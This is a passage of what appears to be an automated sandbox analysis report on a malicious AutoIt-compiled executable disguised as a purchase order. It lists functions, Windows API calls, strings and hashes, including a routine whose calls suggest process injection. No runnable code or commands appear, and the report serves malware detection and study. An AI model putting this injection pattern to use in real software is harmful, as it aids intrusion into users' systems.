                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                        • String ID: Line:
                        • API String ID: 3942752672-1585850449
                        • Opcode ID: 68f4be6f0b2a5afef33f9f10bcd92725a7810db0811486e7ede6cfb7427dbd99
                        • Instruction ID: 939c9f86fbdcdf2e3618d559be09b626f6231df93d048928b6d2f07fdca07f9f
                        • Opcode Fuzzy Hash: 68f4be6f0b2a5afef33f9f10bcd92725a7810db0811486e7ede6cfb7427dbd99
                        • Instruction Fuzzy Hash: 9231C9720287406BD732EF54DC41BDB77ECAF45390F00451EF189921A1DBB0AAA8CF92
                        Function 0030F79F Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 385COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: dE6
                        • API String ID: 0-4062942263
                        • Opcode ID: ebecb11fea8b71ff443d61e7dbe907f575fcacb09a6773d05f7fe408fd011b20
                        • Instruction ID: 1857f0aae5b8ba1a17dce087fe8d590691fa5a418c2cbb9797aa64b0e23ff83b
                        • Opcode Fuzzy Hash: ebecb11fea8b71ff443d61e7dbe907f575fcacb09a6773d05f7fe408fd011b20
                        • Instruction Fuzzy Hash: 8CF19C716087019FC725DF28C891B5AB7E5FF88314F10892EF9998B292DB30E945CF82
                        Function 002B3A67 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON
                        Download Yara Rule
                        APIs
                        • SHGetMalloc.SHELL32(1<+), ref: 002B3A7D
                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 002B3AD2
                        • SHGetDesktopFolder.SHELL32(?), ref: 002B3A8F
                          • Part of subcall function 002B3B1E: _wcsncpy.LIBCMT ref: 002B3B32
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                        • String ID: 1<+
                        • API String ID: 3981382179-94885386
                        • Opcode ID: 039e4fc7fcfd8796965996cba69b92f08f8da231982379062ee2e19d7b47e452
                        • Instruction ID: b8dcaa1a5dbc09db9caabb22ded4f1afd3fa9a133b986a147227012a8b71ae6c
                        • Opcode Fuzzy Hash: 039e4fc7fcfd8796965996cba69b92f08f8da231982379062ee2e19d7b47e452
                        • Instruction Fuzzy Hash: 5F213D76B00114ABCB15DF95D884DEEB7BDEF88744F104098F50ADB255DB709E46CB90
                        Function 002CC955 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58registryCOMMON
                        Download Yara Rule
                        APIs
                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,002CC948,SwapMouseButtons,00000004,?), ref: 002CC979
                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,002CC948,SwapMouseButtons,00000004,?,?,?,?,002CBF22), ref: 002CC99A
                        • RegCloseKey.KERNEL32(00000000,?,?,002CC948,SwapMouseButtons,00000004,?,?,?,?,002CBF22), ref: 002CC9BC
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: CloseOpenQueryValue
                        • String ID: Control Panel\Mouse
                        • API String ID: 3677997916-824357125
                        • Opcode ID: a7e0260b763777ddab353ae0b9db74198250197fc257d125995db49a53cfbded
                        • Instruction ID: dd0683962f1ecc14b41f9291a8a932252bc005ea4b7853191fc676c20b144694
                        • Opcode Fuzzy Hash: a7e0260b763777ddab353ae0b9db74198250197fc257d125995db49a53cfbded
                        • Instruction Fuzzy Hash: 4F117C75521208FFDB218F64DC84EBE7BBCEF04740F20451AE849E7210D231AE609B60
                        Function 03BC12A0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                        Download Yara Rule
                        APIs
                        • CreateProcessW.KERNEL32(?,00000000), ref: 03BC1A5B
                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 03BC1AF1
                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 03BC1B13
                        Memory Dump Source
                        • Source File: 00000000.00000002.1701910428.0000000003BC0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BC0000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_3bc0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                        • String ID:
                        • API String ID: 2438371351-0
                        • Opcode ID: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                        • Instruction ID: e91e9945db9f8c1336999336ca56bfcd1bde2cf27c793c80e38a3c9a20bb356d
                        • Opcode Fuzzy Hash: cc658a0e6010fd3573e63fe9dffc1f366d2843c5c23e1a249a06af30add5367b
                        • Instruction Fuzzy Hash: F9621B30A24258DBEB24CFA4C850BDEB376EF58304F1091A9D10DEB395E7759E81CB59
                        Function 002FCC82 Relevance: 6.2, APIs: 4, Instructions: 154COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B41A7: _fseek.LIBCMT ref: 002B41BF
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF49
                          • Part of subcall function 002FCE59: _wcscmp.LIBCMT ref: 002FCF5C
                        • _free.LIBCMT ref: 002FCDC9
                        • _free.LIBCMT ref: 002FCDD0
                        • _free.LIBCMT ref: 002FCE3B
                          • Part of subcall function 002D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28DE
                          • Part of subcall function 002D28CA: GetLastError.KERNEL32(00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28F0
                        • _free.LIBCMT ref: 002FCE43
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                        • String ID:
                        • API String ID: 1552873950-0
                        • Opcode ID: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                        • Instruction ID: 64946ee38a0febbc4e924336825be209e02c2486609d4cab893060ed2e2b1227
                        • Opcode Fuzzy Hash: 18731f0f7f4a7ef00792dbba070ca72f9465af7f58c3a0cb982353a69a0339a5
                        • Instruction Fuzzy Hash: 51515CB1D1421CAFDB149F68CC81AAEBBB9EF08340F1000AEB61DE3241D7715E908F29
                        Function 002B3BFF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 00323CF1
                        • GetOpenFileNameW.COMDLG32(?,?,00000001,003722E8), ref: 00323D35
                          • Part of subcall function 002B31B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 002B31DA
                          • Part of subcall function 002B3A67: SHGetMalloc.SHELL32(1<+), ref: 002B3A7D
                          • Part of subcall function 002B3A67: SHGetDesktopFolder.SHELL32(?), ref: 002B3A8F
                          • Part of subcall function 002B3A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 002B3AD2
                          • Part of subcall function 002B3B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,003722E8,?), ref: 002B3B65
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: NamePath$Full$DesktopFileFolderFromListMallocOpen_memset
                        • String ID: X
                        • API String ID: 3714316930-3081909835
                        • Opcode ID: 90968ef0ba4f00b5d83f665ae83458e4da74da79b8eb4cc23d74f9da7043a5fd
                        • Instruction ID: b7caeafac1701b48a7ba1a0dfa8421b4a3f76692e0a27dbea23fd422aa0684c5
                        • Opcode Fuzzy Hash: 90968ef0ba4f00b5d83f665ae83458e4da74da79b8eb4cc23d74f9da7043a5fd
                        • Instruction Fuzzy Hash: DF11A3B1A20298ABCF06DFD8D8056DEBBFDAF45704F14800AE401BB345DBB45A598FA1
                        Function 002FD009 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15COMMON
                        Download Yara Rule
                        APIs
                        • GetTempPathW.KERNEL32(00000104,?), ref: 002FD01E
                        • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 002FD035
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Temp$FileNamePath
                        • String ID: aut
                        • API String ID: 3285503233-3010740371
                        • Opcode ID: ee7f4368eb6b7bbc7eab6e0ccb42d02fac5a862de5f43bf70abe1a29ad5c2ab6
                        • Instruction ID: ecad72836d97369f5ac845df4c39cf0ad5b50a7d69175d41c90cc07457b7a608
                        • Opcode Fuzzy Hash: ee7f4368eb6b7bbc7eab6e0ccb42d02fac5a862de5f43bf70abe1a29ad5c2ab6
                        • Instruction Fuzzy Hash: 17D05EB154030EBBDB11ABA0ED4EF9A777CA700704F104190B614D10D1D3B0D6558BA0
                        Function 002B3598 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                        Download Yara Rule
                        APIs
                        • _memset.LIBCMT ref: 002B35BE
                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 002B3667
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: IconNotifyShell__memset
                        • String ID:
                        • API String ID: 928536360-0
                        • Opcode ID: f79faa0a16359bd78997461877aa98da427d7becbcf6164f9752b3a125e7aee6
                        • Instruction ID: f05bf0dd7f491b60bab9b091bf11d55860b6fb2d0c5d50a6faae9f77ce78c43c
                        • Opcode Fuzzy Hash: f79faa0a16359bd78997461877aa98da427d7becbcf6164f9752b3a125e7aee6
                        • Instruction Fuzzy Hash: 1A316DB15143019FC732DF29D8856D7BBE8FB49348F00092EF69E87240E771AA98CB56
                        Function 002D45EC Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                        Download Yara Rule
                        APIs
                        • __FF_MSGBANNER.LIBCMT ref: 002D4603
                          • Part of subcall function 002D8E52: __NMSG_WRITE.LIBCMT ref: 002D8E79
                          • Part of subcall function 002D8E52: __NMSG_WRITE.LIBCMT ref: 002D8E83
                        • __NMSG_WRITE.LIBCMT ref: 002D460A
                          • Part of subcall function 002D8EB2: GetModuleFileNameW.KERNEL32(00000000,00370312,00000104,?,00000001,002D0127), ref: 002D8F44
                          • Part of subcall function 002D8EB2: ___crtMessageBoxW.LIBCMT ref: 002D8FF2
                          • Part of subcall function 002D1D65: ___crtCorExitProcess.LIBCMT ref: 002D1D6B
                          • Part of subcall function 002D1D65: ExitProcess.KERNEL32 ref: 002D1D74
                          • Part of subcall function 002D889E: __getptd_noexit.LIBCMT ref: 002D889E
                        • RtlAllocateHeap.NTDLL(01670000,00000000,00000001,?,?,?,?,002D0127,?,002B125D,00000058,?,?), ref: 002D462F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                        • String ID:
                        • API String ID: 1372826849-0
                        • Opcode ID: dfe2c97285e9f42870b6cb35d3b02c1450375e75521f4b2280db4ff43ad84e7b
                        • Instruction ID: 5fa72b227662f5c03e0f1bc1bbcf1d272779162fdf05e5e9e7416ac0e5a9701b
                        • Opcode Fuzzy Hash: dfe2c97285e9f42870b6cb35d3b02c1450375e75521f4b2280db4ff43ad84e7b
                        • Instruction Fuzzy Hash: 99019631631302ABE6253F34AC41A2A734CAB83761F110527FA06D63D1DFF0DC608AA4
                        Function 002FCFC8 Relevance: 4.5, APIs: 3, Instructions: 24filetimeCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,002FCC71,?,?,?,?,?,00000004), ref: 002FCFE1
                        • SetFileTime.KERNEL32(00000000,?,00000000,?,?,002FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 002FCFF7
                        • CloseHandle.KERNEL32(00000000,?,002FCC71,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 002FCFFE
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: File$CloseCreateHandleTime
                        • String ID:
                        • API String ID: 3397143404-0
                        • Opcode ID: b8cd004694d437834853e366c5f27d9d8aa05ad94ad21af1441952edc6fb94c2
                        • Instruction ID: 82e180bdb0c32f07652031f86d6b4805f6a844f8e05246263b37fc681f7b50dc
                        • Opcode Fuzzy Hash: b8cd004694d437834853e366c5f27d9d8aa05ad94ad21af1441952edc6fb94c2
                        • Instruction Fuzzy Hash: E5E08632540214B7D7321F54BC4AFCA7B1DAB05B70F104210FB15690E087B165219798
                        Function 002FC450 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                        Download Yara Rule
                        APIs
                        • _free.LIBCMT ref: 002FC45E
                          • Part of subcall function 002D28CA: RtlFreeHeap.NTDLL(00000000,00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28DE
                          • Part of subcall function 002D28CA: GetLastError.KERNEL32(00000000,?,002D8715,00000000,002D88A3,002D4673,?), ref: 002D28F0
                        • _free.LIBCMT ref: 002FC46F
                        • _free.LIBCMT ref: 002FC481
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _free$ErrorFreeHeapLast
                        • String ID:
                        • API String ID: 776569668-0
                        • Opcode ID: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                        • Instruction ID: 74c25dc002bb5e7702bc9565afd1515071080efa7804318131c5cb5df2512037
                        • Opcode Fuzzy Hash: 6aa3b1e5da2832baa3565b775b747617bd0a6026d08cf9f5b5c0dfc9a3fccd7e
                        • Instruction Fuzzy Hash: 90E0C2A162170AC2CA20AD786940FB393CC2F04390B24187EF549D3282CF14EC60A838
                        Function 002C058E Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 527COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID:
                        • String ID: CALL
                        • API String ID: 0-4196123274
                        • Opcode ID: 6114356ccb23aad45ef5b47eb280c77f5e1fc535881091efe61b86a3938151b3
                        • Instruction ID: 396452160b8a0fe9ece45b8aa03b3e50d9277b9f5ba23c0f9c8ae2a16fe9b28f
                        • Opcode Fuzzy Hash: 6114356ccb23aad45ef5b47eb280c77f5e1fc535881091efe61b86a3938151b3
                        • Instruction Fuzzy Hash: 6E227A70528241CFD728DF14C490F6AB7E1BF85344F258A6DE99A8B262D771ECA4CF42
                        Function 002B131C Relevance: 3.9, APIs: 3, Instructions: 159COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 002B16F2: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,002B14EB), ref: 002B1751
                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 002B159B
                        • CoInitialize.OLE32(00000000), ref: 002B1612
                        • CloseHandle.KERNEL32(00000000), ref: 003258F7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: Handle$CloseInitializeMessageRegisterWindow
                        • String ID:
                        • API String ID: 3815369404-0
                        • Opcode ID: 6a61995500165b5ce425c2471b414b5234df902d8d256cb779672f51bab38ff6
                        • Instruction ID: 10338c738dcea9f5c05ad6d344a40967f15eb8eb524dcea131762dd6ba6a444f
                        • Opcode Fuzzy Hash: 6a61995500165b5ce425c2471b414b5234df902d8d256cb779672f51bab38ff6
                        • Instruction Fuzzy Hash: A971DBBA9212408AC33BDF6FA896494BBFCFB49394F94816ED40E87362DB304494DF51
                        Function 002B4010 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: EA06
                        • API String ID: 4104443479-3962188686
                        • Opcode ID: f82ac2b28cd6efcb91a43784ae6c475672f4c48e20bbd91c788d7eda75af4010
                        • Instruction ID: cc88de8b6ed9b413005c11ecbbe2f0aef974b42702bd0b66cb59828bc65cab82
                        • Opcode Fuzzy Hash: f82ac2b28cd6efcb91a43784ae6c475672f4c48e20bbd91c788d7eda75af4010
                        • Instruction Fuzzy Hash: AC418E31E3415497CB15BF5888D17FE7F628B15380F184965EA86EB283C6319EE48BA1
                        Function 002F30AC Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: _memmove
                        • String ID: "7
                        • API String ID: 4104443479-4215175091
                        • Opcode ID: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                        • Instruction ID: 850cc5e378fb35ccb6ac5f75840855ad7c348e96afab6d4e94dc8912df711eaa
                        • Opcode Fuzzy Hash: 8ae861b08919a90c507ee4f6a46fed65405db0e9e4c8acd5dc8e223ee5cf7305
                        • Instruction Fuzzy Hash: 0001D132210225ABCB24DF2DC891DBBB7A9EFC5354714803EE90ACB205D631E916CB90
                        Function 002B34C1 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 39COMMON
                        Download Yara Rule
                        Strings
                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 003234AA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1700475414.00000000002B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 002B0000, based on PE: true
                        • Associated: 00000000.00000002.1700441669.00000000002B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000033D000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700586974.000000000035E000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700663883.000000000036A000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1700705512.0000000000374000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_2b0000_PO 09110124 EXPRESS SYSTEM-SESB24066.jbxd
                        Similarity
                        • API ID: LibraryLoad
                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                        • API String ID: 1029625771-2684727018
                        • Opcode ID: 694386edb7c82be5ef7a6d06f1ea4bd23d8600ed669c008c6c315348092f47a1
                        • Instruction ID: aef323a91f5e47ddc3ecdf957a350f449cb14022ffec9d575ae10b872a94367f
                        • Opcode Fuzzy Hash: 694386edb7c82be5ef7a6d06f1ea4bd23d8600ed669c008c6c315348092f47a1
